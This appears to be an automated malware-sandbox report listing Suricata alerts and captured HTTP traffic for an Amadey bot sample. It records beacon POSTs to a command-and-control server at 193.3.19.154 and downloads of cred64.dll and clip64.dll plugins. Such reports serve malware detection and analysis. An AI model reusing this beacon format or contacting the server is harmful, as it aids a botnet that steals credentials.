                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49930 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49859 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49794 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49794 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49752 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49752 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49958 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49958 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49940 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49920 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49920 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49940 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49722 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49722 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49826 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49826 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49987 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49987 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49998 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50031 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50031 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50034 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50034 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50023 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50024 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50023 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50035 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49998 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50024 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50009 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50009 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50027 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50028 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50035 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50027 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50022 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50028 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50022 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50030 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50030 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50032 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50032 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50016 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50016 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49967 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49967 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49887 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50019 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50017 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49887 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50017 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50029 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50029 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50019 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50026 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50026 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49898 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49898 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49909 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49909 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49950 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49950 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50018 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50018 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50021 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50021 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50020 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50020 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49976 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50025 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49976 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50025 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50033 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50033 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:50036 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:50036 -> 193.3.19.154:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1
